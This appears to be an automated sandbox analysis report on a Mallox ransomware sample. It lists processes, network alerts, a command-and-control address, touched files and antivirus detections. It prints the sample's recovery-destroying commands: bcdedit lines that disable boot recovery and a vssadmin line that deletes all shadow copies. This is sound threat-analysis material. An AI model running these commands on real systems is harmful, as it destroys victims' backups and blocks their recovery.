Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | June 1, 2024, 8:49 a.m. | June 1, 2024, 9 a.m. |
Process | PID |
---|---|
cmd.exe "C:\Windows\System32\cmd.exe" /c bcdedit /set {current} bootstatuspolicy ignoreallfailures | 2692 |
bcdedit.exe bcdedit /set {current} bootstatuspolicy ignoreallfailures | 2752 |
bcdedit.exe bcdedit /set {current} recoveryenabled no | 2860 |
Name | Response | Post-Analysis Lookup |
---|---|---|
api.ipify.org | 104.26.13.205 | |
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
UDP 192.168.56.101:59002 -> 164.124.101.2:53 | 2047702 | ET INFO External IP Lookup Domain (ipify .org) in DNS Lookup | Misc activity |
UDP 192.168.56.101:59002 -> 8.8.8.8:53 | 2047702 | ET INFO External IP Lookup Domain (ipify .org) in DNS Lookup | Misc activity |
TCP 91.215.85.135:80 -> 192.168.56.101:49172 | 2400013 | ET DROP Spamhaus DROP Listed Traffic Inbound group 14 | Misc Attack |
TCP 192.168.56.101:49171 -> 104.26.13.205:80 | 2021997 | ET POLICY External IP Lookup api.ipify.org | Device Retrieving External IP Address Detected |
TCP 192.168.56.101:49172 -> 91.215.85.135:80 | 2039815 | ET MALWARE Win32/Filecoder.OJC CnC Checkin | A Network Trojan was detected |
Suricata TLS
No Suricata TLS
file | C:\Program Files (x86)\Google\Chrome\Application\65.0.3325.181\libegl.dll |
file | C:\Program Files\Mozilla Firefox\browser\features\formautofill@mozilla.org.xpi |
section | _RDATA |
suspicious_features | GET method with no useragent header | suspicious_request | GET http://api.ipify.org/ |
suspicious_features | POST method with no referer header, POST method with no useragent header, Connection to IP address | suspicious_request | POST http://91.215.85.135/QWEwqdsvsf/ap.php |
request | GET http://api.ipify.org/ |
request | POST http://91.215.85.135/QWEwqdsvsf/ap.php |
request | POST http://91.215.85.135/QWEwqdsvsf/ap.php |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOG |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm\LOCK |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\QuotaManager-journal |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\4cb013792b196a35_1 |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\4cb013792b196a35_0 |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Crashpad\metadata |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\b1152479bea6c46553d8c242ffa5edf2b0a050a7\290dcccb-9986-4f16-98a9-c54df8312e93 |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm\000003.log |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\000003.log |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\CURRENT |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\databases |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\b1152479bea6c46553d8c242ffa5edf2b0a050a7\290dcccb-9986-4f16-98a9-c54df8312e93\index-dir |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\000003.log |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\LOG.old |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Origin Bound Certs |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\chrome_shutdown_ms.txt |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Thumbnails\000003.log |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Extension State |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\LOG.old |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000003.log |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Thumbnails\LOG.old |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\index |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\b1152479bea6c46553d8c242ffa5edf2b0a050a7 |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Crashpad\reports\8dc74f67-39b6-4058-9ac1-6f782fcd0d62.dmp |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG.old |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Shortcuts |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Local State |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOCK |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\previews_opt_out.db |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Last Session |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Cache\index |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\b1152479bea6c46553d8c242ffa5edf2b0a050a7\index.txt |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Cache |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Sync Data |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\databases\Databases.db |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Favicons |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\History |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm\LOG |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\b1152479bea6c46553d8c242ffa5edf2b0a050a7\290dcccb-9986-4f16-98a9-c54df8312e93\52eca80efb7ea8c5_0 |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\TransportSecurity |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_1 |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_0 |
domain | api.ipify.org |
file | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Narrator.lnk |
file | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Magnify.lnk |
file | C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\Fax Recipient.lnk |
file | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\computer.lnk |
file | C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Window Switcher.lnk |
file | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Ease of Access.lnk |
file | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Notepad.lnk |
file | C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Shows Desktop.lnk |
file | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Command Prompt.lnk |
file | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Private Character Editor.lnk |
file | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\On-Screen Keyboard.lnk |
file | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Control Panel.lnk |
file | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Help.lnk |
file | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Windows Explorer.lnk |
file | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Run.lnk |
cmdline | bcdedit /set {current} bootstatuspolicy ignoreallfailures |
cmdline | cmd.exe /c bcdedit /set {current} bootstatuspolicy ignoreallfailures |
cmdline | cmd.exe /c bcdedit /set {current} recoveryenabled no |
cmdline | bcdedit /set {current} recoveryenabled no |
cmdline | "C:\Windows\System32\cmd.exe" /c bcdedit /set {current} bootstatuspolicy ignoreallfailures |
cmdline | "C:\Windows\System32\cmd.exe" /c bcdedit /set {current} recoveryenabled no |
host | 91.215.85.135 |
file | \Device\HarddiskVolume1\Boot\BOOTSTAT.DAT |
command | "c:\windows\system32\cmd.exe" /c bcdedit /set {current} bootstatuspolicy ignoreallfailures |
command | "c:\windows\system32\cmd.exe" /c bcdedit /set {current} recoveryenabled no |
command | bcdedit /set {current} bootstatuspolicy ignoreallfailures |
command | bcdedit /set {current} recoveryenabled no |
cmdline | bcdedit /set {current} bootstatuspolicy ignoreallfailures |
cmdline | bcdedit /set {current} recoveryenabled no |
cmdline | C:\Windows\sysnative\vssadmin.exe delete shadows /all /quiet |
Bkav | W32.Common.AB1E3033 |
Lionic | Trojan.Win32.Mallox.j!c |
Elastic | malicious (high confidence) |
Cynet | Malicious (score: 100) |
CAT-QuickHeal | Ransom.Mallox.S33100643 |
Skyhigh | BehavesLike.Win64.NetLoader.gh |
ALYac | Trojan.Ransom.Filecoder |
Cylance | Unsafe |
VIPRE | Gen:Variant.Lazy.436214 |
Sangfor | Ransom.Win32.Behaviour.swkaa |
K7AntiVirus | Trojan ( 005aa3791 ) |
BitDefender | Gen:Variant.Lazy.436214 |
K7GW | Trojan ( 005aa3791 ) |
Cybereason | malicious.21da18 |
Arcabit | Trojan.Lazy.D6A7F6 |
Symantec | ML.Attribute.HighConfidence |
ESET-NOD32 | a variant of Win64/Filecoder.Mallox.A |
APEX | Malicious |
McAfee | Artemis!71EFE7A21DA1 |
Avast | Win64:RansomX-gen [Ransom] |
ClamAV | Win.Ransomware.Mallox-10030404-0 |
Kaspersky | HEUR:Trojan-Ransom.Win32.Generic |
Alibaba | Ransom:Win64/Mallox.c8e74f9e |
NANO-Antivirus | Trojan.Win64.Encoder.knhmof |
MicroWorld-eScan | Gen:Variant.Lazy.436214 |
Rising | Ransom.OutSider!1.D74B (CLASSIC) |
Emsisoft | Gen:Variant.Lazy.436214 (B) |
F-Secure | Heuristic.HEUR/AGEN.1372165 |
DrWeb | Trojan.Encoder.38731 |
Zillya | Trojan.Filecoder.Win64.114260 |
McAfeeD | ti!45A236E7AA80 |
Trapmine | suspicious.low.ml.score |
FireEye | Generic.mg.71efe7a21da183c4 |
Sophos | Troj/Mallox-B |
Ikarus | Trojan-Ransom.Mallox |
Jiangmin | Trojan.Generic.hsdeh |
Detected | |
Avira | HEUR/AGEN.1372165 |
Antiy-AVL | Trojan/Win32.Agent |
Kingsoft | Win32.Trojan-Ransom.Generic.a |
Gridinsoft | Ransom.Win64.AI.sa |
Microsoft | Ransom:Win64/Mallox.CCCM!MTB |
ViRobot | Trojan.Win.Z.Mallox.489984.G |
ZoneAlarm | HEUR:Trojan-Ransom.Win32.Generic |
GData | Gen:Variant.Lazy.436214 |
Varist | W64/ABRisk.EOOZ-6139 |
AhnLab-V3 | Ransomware/Win.Mallox.R648404 |
TACHYON | Ransom/W64.Agent.489984 |
DeepInstinct | MALICIOUS |
VBA32 | Trojan.Encoder |
dead_host | 192.168.56.1:139 |
dead_host | 192.168.56.1:445 |
dead_host | 192.168.56.1:135 |
dead_host | 192.168.56.101:49169 |
dead_host | 192.168.56.101:49166 |
dead_host | 192.168.56.101:49168 |
dead_host | 192.168.56.101:49175 |
dead_host | 192.168.56.101:49173 |